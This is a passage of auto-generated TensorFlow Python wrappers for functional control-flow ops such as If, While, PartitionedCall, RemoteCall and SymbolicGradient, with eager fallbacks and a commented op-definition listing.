start = _ops.convert_to_tensor(start, _dtypes.int32)
limit = _ops.convert_to_tensor(limit, _dtypes.int32)
delta = _ops.convert_to_tensor(delta, _dtypes.int32)
_inputs_flat = [start, limit, delta] + list(input)
_attrs = ("T", _attr_T, "body", body)
_result = _execute.execute(b"For", len(input), inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"For", _inputs_flat, _attrs, _result, name)
return _result
def _if(cond, input, Tout, then_branch, else_branch, output_shapes=[], name=None):
r"""output = cond ? then_branch(input) : else_branch(input)
Args:
cond: A `Tensor`.
A Tensor. If the tensor is a scalar of non-boolean type, the
scalar is converted to a boolean according to the
following rule: if the scalar is a numerical value, non-zero means
`True` and zero means False; if the scalar is a string, non-empty
means `True` and empty means `False`. If the tensor is not a scalar,
being empty means False and being non-empty means True.
input: A list of `Tensor` objects. A list of input tensors.
Tout: A list of `tf.DTypes`. A list of output types.
then_branch: A function decorated with @Defun.
A function that takes 'inputs' and returns a list of tensors, whose
types are the same as what else_branch returns.
else_branch: A function decorated with @Defun.
A function that takes 'inputs' and returns a list of tensors, whose
types are the same as what then_branch returns.
output_shapes: An optional list of shapes (each a `tf.TensorShape` or list of `ints`). Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A list of `Tensor` objects of type `Tout`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name, "If", name,
_ctx._post_execution_callbacks, cond, input, "Tout", Tout,
"then_branch", then_branch, "else_branch", else_branch,
"output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return _if_eager_fallback(
cond, input, Tout=Tout, then_branch=then_branch,
else_branch=else_branch, output_shapes=output_shapes, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(Tout, (list, tuple)):
raise TypeError(
"Expected list for 'Tout' argument to "
"'if' Op, not %r." % Tout)
Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
if output_shapes is None:
output_shapes = []
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'if' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"If", cond=cond, input=input, Tout=Tout, then_branch=then_branch,
else_branch=else_branch, output_shapes=output_shapes, name=name)
_result = _op.outputs[:]
if not _result:
return _op
_inputs_flat = _op.inputs
_attrs = ("Tcond", _op.get_attr("Tcond"), "Tin", _op.get_attr("Tin"),
"Tout", _op.get_attr("Tout"), "then_branch",
_op.get_attr("then_branch"), "else_branch",
_op.get_attr("else_branch"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"If", _inputs_flat, _attrs, _result, name)
return _result
def If(cond, input, Tout, then_branch, else_branch, output_shapes=[], name=None):
return _if(cond=cond, input=input, Tout=Tout, then_branch=then_branch, else_branch=else_branch, output_shapes=output_shapes, name=name)
If.__doc__ = _if.__doc__
If = _doc_controls.do_not_generate_docs(_kwarg_only(If))
tf_export("raw_ops.If")(If)
def _if_eager_fallback(cond, input, Tout, then_branch, else_branch, output_shapes=[], name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function _if
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(Tout, (list, tuple)):
raise TypeError(
"Expected list for 'Tout' argument to "
"'if' Op, not %r." % Tout)
Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
if output_shapes is None:
output_shapes = []
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'if' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_attr_Tcond, (cond,) = _execute.args_to_matching_eager([cond], _ctx)
_attr_Tin, input = _execute.convert_to_mixed_eager_tensors(input, _ctx)
_inputs_flat = [cond] + list(input)
_attrs = ("Tcond", _attr_Tcond, "Tin", _attr_Tin, "Tout", Tout,
"then_branch", then_branch, "else_branch", else_branch, "output_shapes",
output_shapes)
_result = _execute.execute(b"If", len(Tout), inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"If", _inputs_flat, _attrs, _result, name)
return _result
def partitioned_call(args, Tout, f, config="", config_proto="", executor_type="", name=None):
r"""returns `f(inputs)`, where `f`'s body is placed and partitioned.
Args:
args: A list of `Tensor` objects. A list of input tensors.
Tout: A list of `tf.DTypes`. A list of output types.
f: A function decorated with @Defun.
A function that takes 'args', a list of tensors, and returns 'output',
another list of tensors. Input and output types are specified by 'Tin'
and 'Tout'. The function body of f will be placed and partitioned across
devices, setting this op apart from the regular Call op.
config: An optional `string`. Defaults to `""`.
config_proto: An optional `string`. Defaults to `""`.
executor_type: An optional `string`. Defaults to `""`.
name: A name for the operation (optional).
Returns:
A list of `Tensor` objects of type `Tout`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"PartitionedCall", name, _ctx._post_execution_callbacks, args, "Tout",
Tout, "f", f, "config", config, "config_proto", config_proto,
"executor_type", executor_type)
return _result
except _core._FallbackException:
try:
return partitioned_call_eager_fallback(
args, Tout=Tout, f=f, config=config, config_proto=config_proto,
executor_type=executor_type, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(Tout, (list, tuple)):
raise TypeError(
"Expected list for 'Tout' argument to "
"'partitioned_call' Op, not %r." % Tout)
Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
if config is None:
config = ""
config = _execute.make_str(config, "config")
if config_proto is None:
config_proto = ""
config_proto = _execute.make_str(config_proto, "config_proto")
if executor_type is None:
executor_type = ""
executor_type = _execute.make_str(executor_type, "executor_type")
_, _, _op = _op_def_lib._apply_op_helper(
"PartitionedCall", args=args, Tout=Tout, f=f, config=config,
config_proto=config_proto,
executor_type=executor_type, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("Tin", _op.get_attr("Tin"), "Tout", _op.get_attr("Tout"), "f",
_op.get_attr("f"), "config", _op.get_attr("config"),
"config_proto", _op.get_attr("config_proto"), "executor_type",
_op.get_attr("executor_type"))
_execute.record_gradient(
"PartitionedCall", _inputs_flat, _attrs, _result, name)
return _result
def PartitionedCall(args, Tout, f, config="", config_proto="", executor_type="", name=None):
return partitioned_call(args=args, Tout=Tout, f=f, config=config, config_proto=config_proto, executor_type=executor_type, name=name)
PartitionedCall.__doc__ = partitioned_call.__doc__
PartitionedCall = _doc_controls.do_not_generate_docs(_kwarg_only(PartitionedCall))
tf_export("raw_ops.PartitionedCall")(PartitionedCall)
def partitioned_call_eager_fallback(args, Tout, f, config="", config_proto="", executor_type="", name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function partitioned_call
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(Tout, (list, tuple)):
raise TypeError(
"Expected list for 'Tout' argument to "
"'partitioned_call' Op, not %r." % Tout)
Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
if config is None:
config = ""
config = _execute.make_str(config, "config")
if config_proto is None:
config_proto = ""
config_proto = _execute.make_str(config_proto, "config_proto")
if executor_type is None:
executor_type = ""
executor_type = _execute.make_str(executor_type, "executor_type")
_attr_Tin, args = _execute.convert_to_mixed_eager_tensors(args, _ctx)
_inputs_flat = list(args)
_attrs = ("Tin", _attr_Tin, "Tout", Tout, "f", f, "config", config,
"config_proto", config_proto, "executor_type", executor_type)
_result = _execute.execute(b"PartitionedCall", len(Tout),
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"PartitionedCall", _inputs_flat, _attrs, _result, name)
return _result
def remote_call(target, args, Tout, f, name=None):
r"""Runs function `f` on a remote device indicated by `target`.
Args:
target: A `Tensor` of type `string`.
A fully specified device name where we want to run the function.
args: A list of `Tensor` objects. A list of arguments for the function.
Tout: A list of `tf.DTypes` that has length `>= 1`.
The type list for the return values.
f: A function decorated with @Defun. The function to run remotely.
name: A name for the operation (optional).
Returns:
A list of `Tensor` objects of type `Tout`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"RemoteCall", name, _ctx._post_execution_callbacks, target, args,
"Tout", Tout, "f", f)
return _result
except _core._FallbackException:
try:
return remote_call_eager_fallback(
target, args, Tout=Tout, f=f, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(Tout, (list, tuple)):
raise TypeError(
"Expected list for 'Tout' argument to "
"'remote_call' Op, not %r." % Tout)
Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
_, _, _op = _op_def_lib._apply_op_helper(
"RemoteCall", target=target, args=args, Tout=Tout, f=f, name=name)
_result = _op.outputs[:]
if not _result:
return _op
_inputs_flat = _op.inputs
_attrs = ("Tin", _op.get_attr("Tin"), "Tout", _op.get_attr("Tout"), "f",
_op.get_attr("f"))
_execute.record_gradient(
"RemoteCall", _inputs_flat, _attrs, _result, name)
return _result
def RemoteCall(target, args, Tout, f, name=None):
return remote_call(target=target, args=args, Tout=Tout, f=f, name=name)
RemoteCall.__doc__ = remote_call.__doc__
RemoteCall = _doc_controls.do_not_generate_docs(_kwarg_only(RemoteCall))
tf_export("raw_ops.RemoteCall")(RemoteCall)
def remote_call_eager_fallback(target, args, Tout, f, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function remote_call
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(Tout, (list, tuple)):
raise TypeError(
"Expected list for 'Tout' argument to "
"'remote_call' Op, not %r." % Tout)
Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
_attr_Tin, args = _execute.convert_to_mixed_eager_tensors(args, _ctx)
target = _ops.convert_to_tensor(target, _dtypes.string)
_inputs_flat = [target] + list(args)
_attrs = ("Tin", _attr_Tin, "Tout", Tout, "f", f)
_result = _execute.execute(b"RemoteCall", len(Tout), inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"RemoteCall", _inputs_flat, _attrs, _result, name)
return _result
def stateful_partitioned_call(args, Tout, f, config="", config_proto="", executor_type="", name=None):
r"""returns `f(inputs)`, where `f`'s body is placed and partitioned.
Args:
args: A list of `Tensor` objects. A list of input tensors.
Tout: A list of `tf.DTypes`. A list of output types.
f: A function decorated with @Defun.
A function that takes 'args', a list of tensors, and returns 'output',
another list of tensors. Input and output types are specified by 'Tin'
and 'Tout'. The function body of f will be placed and partitioned across
devices, setting this op apart from the regular Call op. This op is
stateful.
config: An optional `string`. Defaults to `""`.
config_proto: An optional `string`. Defaults to `""`.
executor_type: An optional `string`. Defaults to `""`.
name: A name for the operation (optional).
Returns:
A list of `Tensor` objects of type `Tout`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"StatefulPartitionedCall", name, _ctx._post_execution_callbacks, args,
"Tout", Tout, "f", f, "config", config, "config_proto", config_proto,
"executor_type", executor_type)
return _result
except _core._FallbackException:
try:
return stateful_partitioned_call_eager_fallback(
args, Tout=Tout, f=f, config=config, config_proto=config_proto,
executor_type=executor_type, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(Tout, (list, tuple)):
raise TypeError(
"Expected list for 'Tout' argument to "
"'stateful_partitioned_call' Op, not %r." % Tout)
Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
if config is None:
config = ""
config = _execute.make_str(config, "config")
if config_proto is None:
config_proto = ""
config_proto = _execute.make_str(config_proto, "config_proto")
if executor_type is None:
executor_type = ""
executor_type = _execute.make_str(executor_type, "executor_type")
_, _, _op = _op_def_lib._apply_op_helper(
"StatefulPartitionedCall", args=args, Tout=Tout, f=f, config=config,
config_proto=config_proto,
executor_type=executor_type, name=name)
_result = _op.outputs[:]
if not _result:
return _op
_inputs_flat = _op.inputs
_attrs = ("Tin", _op.get_attr("Tin"), "Tout", _op.get_attr("Tout"), "f",
_op.get_attr("f"), "config", _op.get_attr("config"),
"config_proto", _op.get_attr("config_proto"), "executor_type",
_op.get_attr("executor_type"))
_execute.record_gradient(
"StatefulPartitionedCall", _inputs_flat, _attrs, _result, name)
return _result
def StatefulPartitionedCall(args, Tout, f, config="", config_proto="", executor_type="", name=None):
return stateful_partitioned_call(args=args, Tout=Tout, f=f, config=config, config_proto=config_proto, executor_type=executor_type, name=name)
StatefulPartitionedCall.__doc__ = stateful_partitioned_call.__doc__
StatefulPartitionedCall = _doc_controls.do_not_generate_docs(_kwarg_only(StatefulPartitionedCall))
tf_export("raw_ops.StatefulPartitionedCall")(StatefulPartitionedCall)
def stateful_partitioned_call_eager_fallback(args, Tout, f, config="", config_proto="", executor_type="", name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function stateful_partitioned_call
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(Tout, (list, tuple)):
raise TypeError(
"Expected list for 'Tout' argument to "
"'stateful_partitioned_call' Op, not %r." % Tout)
Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
if config is None:
config = ""
config = _execute.make_str(config, "config")
if config_proto is None:
config_proto = ""
config_proto = _execute.make_str(config_proto, "config_proto")
if executor_type is None:
executor_type = ""
executor_type = _execute.make_str(executor_type, "executor_type")
_attr_Tin, args = _execute.convert_to_mixed_eager_tensors(args, _ctx)
_inputs_flat = list(args)
_attrs = ("Tin", _attr_Tin, "Tout", Tout, "f", f, "config", config,
"config_proto", config_proto, "executor_type", executor_type)
_result = _execute.execute(b"StatefulPartitionedCall", len(Tout),
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"StatefulPartitionedCall", _inputs_flat, _attrs, _result, name)
return _result
def stateless_if(cond, input, Tout, then_branch, else_branch, name=None):
r"""output = cond ? then_branch(input) : else_branch(input)
Args:
cond: A `Tensor`.
A Tensor. If the tensor is a scalar of non-boolean type, the
scalar is converted to a boolean according to the
following rule: if the scalar is a numerical value, non-zero means
`True` and zero means False; if the scalar is a string, non-empty
means `True` and empty means `False`. If the tensor is not a scalar,
being empty means False and being non-empty means True.
This should only be used when the if then/else body functions do not
have stateful ops.
input: A list of `Tensor` objects. A list of input tensors.
Tout: A list of `tf.DTypes`. A list of output types.
then_branch: A function decorated with @Defun.
A function that takes 'inputs' and returns a list of tensors, whose
types are the same as what else_branch returns.
else_branch: A function decorated with @Defun.
A function that takes 'inputs' and returns a list of tensors, whose
types are the same as what then_branch returns.
name: A name for the operation (optional).
Returns:
A list of `Tensor` objects of type `Tout`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"StatelessIf", name, _ctx._post_execution_callbacks, cond, input,
"Tout", Tout, "then_branch", then_branch, "else_branch", else_branch)
return _result
except _core._FallbackException:
try:
return stateless_if_eager_fallback(
cond, input, Tout=Tout, then_branch=then_branch,
else_branch=else_branch, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(Tout, (list, tuple)):
raise TypeError(
"Expected list for 'Tout' argument to "
"'stateless_if' Op, not %r." % Tout)
Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
_, _, _op = _op_def_lib._apply_op_helper(
"StatelessIf", cond=cond, input=input, Tout=Tout,
then_branch=then_branch, else_branch=else_branch,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("Tcond", _op.get_attr("Tcond"), "Tin", _op.get_attr("Tin"),
"Tout", _op.get_attr("Tout"), "then_branch",
_op.get_attr("then_branch"), "else_branch",
_op.get_attr("else_branch"))
_execute.record_gradient(
"StatelessIf", _inputs_flat, _attrs, _result, name)
return _result
def StatelessIf(cond, input, Tout, then_branch, else_branch, name=None):
return stateless_if(cond=cond, input=input, Tout=Tout, then_branch=then_branch, else_branch=else_branch, name=name)
StatelessIf.__doc__ = stateless_if.__doc__
StatelessIf = _doc_controls.do_not_generate_docs(_kwarg_only(StatelessIf))
tf_export("raw_ops.StatelessIf")(StatelessIf)
def stateless_if_eager_fallback(cond, input, Tout, then_branch, else_branch, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function stateless_if
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(Tout, (list, tuple)):
raise TypeError(
"Expected list for 'Tout' argument to "
"'stateless_if' Op, not %r." % Tout)
Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
_attr_Tcond, (cond,) = _execute.args_to_matching_eager([cond], _ctx)
_attr_Tin, input = _execute.convert_to_mixed_eager_tensors(input, _ctx)
_inputs_flat = [cond] + list(input)
_attrs = ("Tcond", _attr_Tcond, "Tin", _attr_Tin, "Tout", Tout,
"then_branch", then_branch, "else_branch", else_branch)
_result = _execute.execute(b"StatelessIf", len(Tout), inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"StatelessIf", _inputs_flat, _attrs, _result, name)
return _result
def stateless_while(input, cond, body, name=None):
r"""output = input; While (Cond(output)) { output = Body(output) }
Args:
input: A list of `Tensor` objects.
A list of input tensors whose types are T.
cond: A function decorated with @Defun.
A function takes 'input' and returns a tensor. If the tensor is
a scalar of non-boolean, the scalar is converted to a boolean
according to the following rule: if the scalar is a numerical
value, non-zero means True and zero means False; if the scalar is
a string, non-empty means True and empty means False. If the
tensor is not a scalar, non-emptiness means True and False
otherwise.
This should only be used when the while condition and body functions
do not have stateful ops.
body: A function decorated with @Defun.
A function that takes a list of tensors and returns another
list of tensors. Both lists have the same types as specified
by T.
name: A name for the operation (optional).
Returns:
A list of `Tensor` objects. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"StatelessWhile", name, _ctx._post_execution_callbacks, input, "cond",
cond, "body", body)
return _result
except _core._FallbackException:
try:
return stateless_while_eager_fallback(
input, cond=cond, body=body, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
_, _, _op = _op_def_lib._apply_op_helper(
"StatelessWhile", input=input, cond=cond, body=body, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("T", _op.get_attr("T"), "cond", _op.get_attr("cond"), "body",
_op.get_attr("body"))
_execute.record_gradient(
"StatelessWhile", _inputs_flat, _attrs, _result, name)
return _result
def StatelessWhile(input, cond, body, name=None):
return stateless_while(input=input, cond=cond, body=body, name=name)
StatelessWhile.__doc__ = stateless_while.__doc__
StatelessWhile = _doc_controls.do_not_generate_docs(_kwarg_only(StatelessWhile))
tf_export("raw_ops.StatelessWhile")(StatelessWhile)
def stateless_while_eager_fallback(input, cond, body, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function stateless_while
"""
_ctx = ctx if ctx else _context.context()
_attr_T, input = _execute.convert_to_mixed_eager_tensors(input, _ctx)
_inputs_flat = list(input)
_attrs = ("T", _attr_T, "cond", cond, "body", body)
_result = _execute.execute(b"StatelessWhile", len(input),
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"StatelessWhile", _inputs_flat, _attrs, _result, name)
return _result
def symbolic_gradient(input, Tout, f, name=None):
r"""Computes the gradient function for function f via backpropagation.
Args:
input: A list of `Tensor` objects. a list of input tensors of size N + M;
Tout: A list of `tf.DTypes` that has length `>= 1`.
the type list for the input list.
f: A function decorated with @Defun.
The function we want to compute the gradient for.
The function 'f' must be a numerical function which takes N inputs and
produces M outputs. Its gradient function 'g', which is computed by
this SymbolicGradient op is a function taking N + M inputs and
produces N outputs.
I.e. if we have
(y1, y2, ..., y_M) = f(x1, x2, ..., x_N),
then, g is
(dL/dx1, dL/dx2, ..., dL/dx_N) = g(x1, x2, ..., x_N,
dL/dy1, dL/dy2, ..., dL/dy_M),
where L is a scalar-value function of (x1, x2, ..., xN) (e.g., the
loss function). dL/dx_i is the partial derivative of L with respect
to x_i.
(Needs some math expert to say the comment above better.)
name: A name for the operation (optional).
Returns:
A list of `Tensor` objects of type `Tout`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"SymbolicGradient", name, _ctx._post_execution_callbacks, input,
"Tout", Tout, "f", f)
return _result
except _core._FallbackException:
try:
return symbolic_gradient_eager_fallback(
input, Tout=Tout, f=f, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(Tout, (list, tuple)):
raise TypeError(
"Expected list for 'Tout' argument to "
"'symbolic_gradient' Op, not %r." % Tout)
Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
_, _, _op = _op_def_lib._apply_op_helper(
"SymbolicGradient", input=input, Tout=Tout, f=f, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("Tin", _op.get_attr("Tin"), "Tout", _op.get_attr("Tout"), "f",
_op.get_attr("f"))
_execute.record_gradient(
"SymbolicGradient", _inputs_flat, _attrs, _result, name)
return _result
def SymbolicGradient(input, Tout, f, name=None):
return symbolic_gradient(input=input, Tout=Tout, f=f, name=name)
SymbolicGradient.__doc__ = symbolic_gradient.__doc__
SymbolicGradient = _doc_controls.do_not_generate_docs(_kwarg_only(SymbolicGradient))
tf_export("raw_ops.SymbolicGradient")(SymbolicGradient)
def symbolic_gradient_eager_fallback(input, Tout, f, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function symbolic_gradient
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(Tout, (list, tuple)):
raise TypeError(
"Expected list for 'Tout' argument to "
"'symbolic_gradient' Op, not %r." % Tout)
Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
_attr_Tin, input = _execute.convert_to_mixed_eager_tensors(input, _ctx)
_inputs_flat = list(input)
_attrs = ("Tin", _attr_Tin, "Tout", Tout, "f", f)
_result = _execute.execute(b"SymbolicGradient", len(Tout),
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"SymbolicGradient", _inputs_flat, _attrs, _result, name)
return _result
def _while(input, cond, body, output_shapes=[], parallel_iterations=10, name=None):
r"""output = input; While (Cond(output)) { output = Body(output) }
Args:
input: A list of `Tensor` objects.
A list of input tensors whose types are T.
cond: A function decorated with @Defun.
A function takes 'input' and returns a tensor. If the tensor is
a scalar of non-boolean, the scalar is converted to a boolean
according to the following rule: if the scalar is a numerical
value, non-zero means True and zero means False; if the scalar is
a string, non-empty means True and empty means False. If the
tensor is not a scalar, non-emptiness means True and False
otherwise.
body: A function decorated with @Defun.
A function that takes a list of tensors and returns another
list of tensors. Both lists have the same types as specified
by T.
output_shapes: An optional list of shapes (each a `tf.TensorShape` or list of `ints`). Defaults to `[]`.
parallel_iterations: An optional `int`. Defaults to `10`.
name: A name for the operation (optional).
Returns:
A list of `Tensor` objects. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name, "While",
name, _ctx._post_execution_callbacks, input, "cond", cond, "body",
body, "output_shapes", output_shapes, "parallel_iterations",
parallel_iterations)
return _result
except _core._FallbackException:
try:
return _while_eager_fallback(
input, cond=cond, body=body, output_shapes=output_shapes,
parallel_iterations=parallel_iterations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if output_shapes is None:
output_shapes = []
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'while' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
if parallel_iterations is None:
parallel_iterations = 10
parallel_iterations = _execute.make_int(parallel_iterations, "parallel_iterations")
_, _, _op = _op_def_lib._apply_op_helper(
"While", input=input, cond=cond, body=body,
output_shapes=output_shapes,
parallel_iterations=parallel_iterations, name=name)
_result = _op.outputs[:]
if not _result:
return _op
_inputs_flat = _op.inputs
_attrs = ("T", _op.get_attr("T"), "cond", _op.get_attr("cond"), "body",
_op.get_attr("body"), "output_shapes",
_op.get_attr("output_shapes"), "parallel_iterations",
_op.get_attr("parallel_iterations"))
_execute.record_gradient(
"While", _inputs_flat, _attrs, _result, name)
return _result
def While(input, cond, body, output_shapes=[], parallel_iterations=10, name=None):
return _while(input=input, cond=cond, body=body, output_shapes=output_shapes, parallel_iterations=parallel_iterations, name=name)
While.__doc__ = _while.__doc__
While = _doc_controls.do_not_generate_docs(_kwarg_only(While))
tf_export("raw_ops.While")(While)
def _while_eager_fallback(input, cond, body, output_shapes=[], parallel_iterations=10, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function _while
"""
_ctx = ctx if ctx else _context.context()
if output_shapes is None:
output_shapes = []
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'while' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
if parallel_iterations is None:
parallel_iterations = 10
parallel_iterations = _execute.make_int(parallel_iterations, "parallel_iterations")
_attr_T, input = _execute.convert_to_mixed_eager_tensors(input, _ctx)
_inputs_flat = list(input)
_attrs = ("T", _attr_T, "cond", cond, "body", body, "output_shapes",
output_shapes, "parallel_iterations", parallel_iterations)
_result = _execute.execute(b"While", len(input), inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"While", _inputs_flat, _attrs, _result, name)
return _result
def _InitOpDefLibrary(op_list_proto_bytes):
op_list = _op_def_pb2.OpList()
op_list.ParseFromString(op_list_proto_bytes)
_op_def_registry.register_op_list(op_list)
op_def_lib = _op_def_library.OpDefLibrary()
op_def_lib.add_op_list(op_list)
return op_def_lib
# op {
# name: "Case"
# input_arg {
# name: "branch_index"
# type: DT_INT32
# }
# input_arg {
# name: "input"
# type_list_attr: "Tin"
# }
# output_arg {
# name: "output"
# type_list_attr: "Tout"
# }
# attr {
# name: "Tin"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Tout"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "branches"
# type: "list(func)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# default_value {
# list {
# }
# }
# }
# is_stateful: true
# }
# op {
# name: "FakeParam"
# output_arg {
# name: "output"
# type_attr: "dtype"
# }
# attr {
# name: "dtype"
# type: "type"
# }
# attr {
# name: "shape"
# type: "shape"
# }
# }
# op {
# name: "For"
# input_arg {
# name: "start"
# type: DT_INT32
# }
# input_arg {
# name: "limit"
# type: DT_INT32
# }
# input_arg {
# name: "delta"
# type: DT_INT32
# }
# input_arg {
# name: "input"
# type_list_attr: "T"
# }
# output_arg {
# name: "output"
# type_list_attr: "T"
# }
# attr {
# name: "T"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "body"
# type: "func"
# }
# }
# op {
# name: "If"
# input_arg {
# name: "cond"
# type_attr: "Tcond"
# }
# input_arg {
# name: "input"
# type_list_attr: "Tin"
# }
# output_arg {
# name: "output"
# type_list_attr: "Tout"
# }
# attr {
# name: "Tcond"
# type: "type"
# }
# attr {
# name: "Tin"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Tout"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "then_branch"
# type: "func"
# }
# attr {
# name: "else_branch"
# type: "func"
# }
# attr {
